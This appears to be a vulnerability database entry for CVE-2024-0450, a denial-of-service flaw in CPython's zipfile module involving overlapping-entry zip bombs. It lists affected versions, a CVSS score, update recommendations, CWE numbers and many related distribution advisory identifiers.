PT-2023-9227 · Python+13 · Cpython+13

Ee Durbin

Published

2023-09-25

Updated

2025-08-11

CVE-2024-0450

CVSS v3.1

6.2

Medium

Vector

AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Name of the Vulnerable Software and Affected Versions CPython versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior

Description The CPython zipfile module is vulnerable to “quoted-overlap” zip-bombs, which exploit the zip format to create a zip-bomb with a high compression ratio. This issue can be exploited to cause a denial of service condition by persuading a victim to open a specially crafted ZIP file. The fixed versions of CPython make the zipfile module reject zip archives that overlap entries in the archive.

Recommendations For versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior, update to a version that includes the fix for the zipfile module vulnerability. As a temporary workaround, consider disabling the zipfile module until a patch is available. Restrict access to the zipfile module to minimize the risk of exploitation. Avoid using the zipfile module to open untrusted ZIP files until the issue is resolved.

Fix

DoS

Improper Resource Release

Resource Exhaustion

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-405CWE-404CWE-400

Related Identifiers

ALSA-2024:3347

ALSA-2024:3466

ALSA-2024:4058

ALSA-2024:4078

ALSA-2024:4243

ALSA-2024:9190

ALSA-2024:9192

ALT-PU-2024-12993

ALT-PU-2024-14497

AZL-36894

AZL-42573

BDU:2024-04927

BIT-LIBPYTHON-2024-0450

BIT-PYTHON-2024-0450

BIT-PYTHON-MIN-2024-0450

CESA-2024_3347

CESA-2024_3466

CESA-2024_4058

CESA-2024_4243

CVE-2024-0450

DLA-3771-1

DLA-3772-1

DLA-3948-1

DLA-3980-1

INFSA-2024_3347

INFSA-2024_3466

INFSA-2024_4058

INFSA-2024_4078

INFSA-2024_4243

INFSA-2024_9190

INFSA-2024_9192

MGASA-2024-0096

OESA-2024-2141

OESA-2024-2190

OESA-2024-2191

OESA-2024-2193

OPENSUSE-SU-2024:13790-1

OPENSUSE-SU-2024:13794-1

OPENSUSE-SU-2024:13799-1

OPENSUSE-SU-2024:13800-1

OPENSUSE-SU-2024:13983-1

OPENSUSE-SU-2024_1162-1

OPENSUSE-SU-2024_1862-1

PSF-2024-2

RHSA-2024:3347

RHSA-2024:3391

RHSA-2024:3466

RHSA-2024:4058

RHSA-2024:4078

RHSA-2024:4243

RHSA-2024:4406

RHSA-2024:9190

RHSA-2024:9192

RHSA-2024_3347

RHSA-2024_3466

RHSA-2024_4058

RHSA-2024_4078

RHSA-2024_4243

RHSA-2024_9190

RHSA-2024_9192

RLSA-2024:3347

RLSA-2024:3466

RLSA-2024:4078

RLSA-2024:9190

RLSA-2024:9192

SUSE-SU-2024:1009-1

SUSE-SU-2024:1162-1

SUSE-SU-2024:1556-1

SUSE-SU-2024:1774-1

SUSE-SU-2024:1843-1

SUSE-SU-2024:1844-1

SUSE-SU-2024:1847-1

SUSE-SU-2024:1862-1

SUSE-SU-2024:2479-1

SUSE-SU-2024_1843-1

SUSE-SU-2024_1844-1

SUSE-SU-2025:20025-1

SUSE-SU-2025:20154-1

SUSE-SU-2025:20374-1

USN-6891-1

USN-7212-1

Affected Products

Alt Linux

Almalinux

Astra Linux

Cpython

Centos

Debian

Ibm Aix

Linuxmint

Red Hat

Red Os

Rocky Linux

Suse

Ubuntu

Zvirt Node

PT-2023-9227 · Python+13 · Cpython+13

CVE-2024-0450

Weakness Enumeration

Related Identifiers

Affected Products

References · 258